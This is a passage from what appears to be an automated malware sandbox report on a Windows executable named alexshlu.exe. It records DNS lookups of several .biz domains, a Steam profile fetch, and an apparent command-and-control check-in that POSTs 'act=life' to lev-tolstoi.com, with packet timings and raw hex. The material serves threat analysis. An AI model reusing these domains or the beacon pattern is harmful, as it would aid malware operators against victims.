                                                                                                                                                                                                                                      Dec 18, 2024 12:08:20.629296064 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.852916956 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.853001118 CET49712443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.854399920 CET49712443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.854428053 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.854676008 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.856296062 CET49712443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.856471062 CET49712443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.856523037 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.856703997 CET49712443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:21.899346113 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.675235033 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.675350904 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.675416946 CET49712443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.675771952 CET49712443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.675797939 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.951392889 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.951430082 CET44349713172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.951514006 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.951966047 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:24.951982021 CET44349713172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.165772915 CET44349713172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.165875912 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.167361975 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.167373896 CET44349713172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.167618036 CET44349713172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.169047117 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.169208050 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.169241905 CET44349713172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.169593096 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:26.169603109 CET44349713172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:30.533828020 CET44349713172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:30.533947945 CET44349713172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:30.534130096 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:30.534537077 CET49713443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:31.005072117 CET49714443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:31.005116940 CET44349714172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:31.005249977 CET49714443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:31.005613089 CET49714443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:31.005625010 CET44349714172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.212941885 CET44349714172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.213116884 CET49714443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.214601994 CET49714443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.214613914 CET44349714172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.214930058 CET44349714172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.216730118 CET49714443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.216803074 CET49714443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.216809988 CET44349714172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.964867115 CET44349714172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.964977026 CET44349714172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.965048075 CET49714443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.965225935 CET49714443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:32.965243101 CET44349714172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:33.535789967 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:33.535830975 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:33.536190987 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:33.536278009 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:33.536287069 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.744465113 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.746543884 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.746696949 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.746704102 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.746943951 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.748821020 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.750885010 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.750927925 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.751053095 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.751202106 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.751383066 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.751429081 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.751583099 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.751605988 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.751804113 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.751836061 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.751979113 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.752007961 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.752022028 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.752036095 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.752196074 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.752218962 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.752240896 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.752393961 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.752432108 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.799329042 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.799698114 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.799736977 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.799762964 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.799784899 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.799813032 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.799825907 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.801697016 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:34.801716089 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.425941944 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.426048040 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.426090956 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.426309109 CET49715443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.426330090 CET44349715172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.483972073 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.484020948 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.484082937 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.484813929 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:39.484831095 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.694865942 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.694941998 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.696257114 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.696273088 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.696537018 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.697835922 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.697864056 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.697922945 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.408673048 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.408768892 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.408883095 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.409162045 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.409189939 CET44349716172.67.157.254192.168.2.8

                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:01.756994009 CET5771253192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:01.977881908 CET53577121.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:01.982893944 CET5604153192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.217930079 CET53560411.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.221141100 CET6529553192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.448421955 CET53652951.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.451320887 CET6333253192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.668807030 CET53633321.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.688843012 CET4994853192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.910460949 CET53499481.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.913399935 CET5875853192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.144762993 CET53587581.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.147869110 CET5173853192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.383033991 CET53517381.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.390182972 CET6076453192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.612596035 CET53607641.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.701371908 CET6371953192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.915025949 CET53637191.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.921665907 CET5806753192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:04.059670925 CET53580671.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.115183115 CET6539953192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.365803957 CET53653991.1.1.1192.168.2.8

                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:01.756994009 CET192.168.2.81.1.1.10xc2f4Standard query (0)drive-connect.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:01.982893944 CET192.168.2.81.1.1.10xfc05Standard query (0)se-blurry.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.221141100 CET192.168.2.81.1.1.10xa56fStandard query (0)zinc-sneark.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.451320887 CET192.168.2.81.1.1.10xadc9Standard query (0)dwell-exclaim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.688843012 CET192.168.2.81.1.1.10x31f6Standard query (0)formy-spill.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.913399935 CET192.168.2.81.1.1.10xef00Standard query (0)covery-mover.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.147869110 CET192.168.2.81.1.1.10x5ed9Standard query (0)dare-curbys.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.390182972 CET192.168.2.81.1.1.10x1a54Standard query (0)print-vexer.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.701371908 CET192.168.2.81.1.1.10x23acStandard query (0)impend-differ.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.921665907 CET192.168.2.81.1.1.10x4bdStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.115183115 CET192.168.2.81.1.1.10x9535Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:01.977881908 CET1.1.1.1192.168.2.80xc2f4Name error (3)drive-connect.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.217930079 CET1.1.1.1192.168.2.80xfc05Name error (3)se-blurry.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.448421955 CET1.1.1.1192.168.2.80xa56fName error (3)zinc-sneark.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.668807030 CET1.1.1.1192.168.2.80xadc9Name error (3)dwell-exclaim.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:02.910460949 CET1.1.1.1192.168.2.80x31f6Name error (3)formy-spill.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.144762993 CET1.1.1.1192.168.2.80xef00Name error (3)covery-mover.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.383033991 CET1.1.1.1192.168.2.80x5ed9Name error (3)dare-curbys.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.612596035 CET1.1.1.1192.168.2.80x1a54Name error (3)print-vexer.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:03.915025949 CET1.1.1.1192.168.2.80x23acName error (3)impend-differ.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:04.059670925 CET1.1.1.1192.168.2.80x4bdNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.365803957 CET1.1.1.1192.168.2.80x9535No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.365803957 CET1.1.1.1192.168.2.80x9535No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                      • lev-tolstoi.com

                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.84970623.55.153.1064437720C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 11:08:05 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2024-12-18 11:08:06 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:05 GMT
                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=8a0582c0d1571303a7d0d81f; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2024-12-18 11:08:06 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                      2024-12-18 11:08:06 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                      Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                      2024-12-18 11:08:06 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                      Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.849707172.67.157.2544437720C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 11:08:08 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 11:08:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                      2024-12-18 11:08:11 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=6h1dpvi0q93fltpo490276grf0; expires=Sun, 13-Apr-2025 04:54:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mRi2uk9wWhy2znQAvV8uBZDBTOnT2foqqYhKB9eMlZIiOJYhP6jOZGZcxXJolnq%2BMXPR9WCqfO%2Bj0tpk65KHCDig51VDd89BQRQXAauCd%2BfWAq9yqtHT%2B8fLj%2Fksyj9BYzA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb17b5c1a7ca6-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2054&min_rtt=2042&rtt_var=790&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1363211&cwnd=236&unsent_bytes=0&cid=3e62297cf3b4f895&ts=3034&x=0"
                                                                                                                                                                                                                                      2024-12-18 11:08:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                      2024-12-18 11:08:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


